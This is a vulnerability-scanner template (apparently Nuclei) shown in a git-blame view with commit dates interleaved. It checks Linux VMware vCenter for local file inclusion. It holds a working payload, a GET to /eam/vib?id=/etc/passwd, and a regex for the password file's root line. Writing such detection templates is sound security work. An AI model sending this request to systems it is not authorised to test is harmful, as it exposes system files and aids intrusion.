2020-12-13 20:30:05 +00:00
|
|
|
id: vmware-vcenter-lfi-linux
|
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: Linux Vmware Vcenter - Local File Inclusion
|
2020-12-13 20:30:05 +00:00
|
|
|
author: PR3R00T
|
2020-12-14 19:44:06 +00:00
|
|
|
severity: high
|
2022-08-05 13:57:51 +00:00
|
|
|
description: Linux appliance based Vmware Vcenter is vulnerable to local file inclusion.
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2023-03-02 19:06:32 +00:00
|
|
|
tags: vmware,lfi,vcenter,linux
|
2020-12-13 20:30:05 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2023-03-02 19:03:52 +00:00
|
|
|
- "{{BaseURL}}/eam/vib?id=/etc/passwd"
|
2023-03-02 19:06:32 +00:00
|
|
|
|
2020-12-13 20:30:05 +00:00
|
|
|
matchers:
|
2023-03-02 19:03:52 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|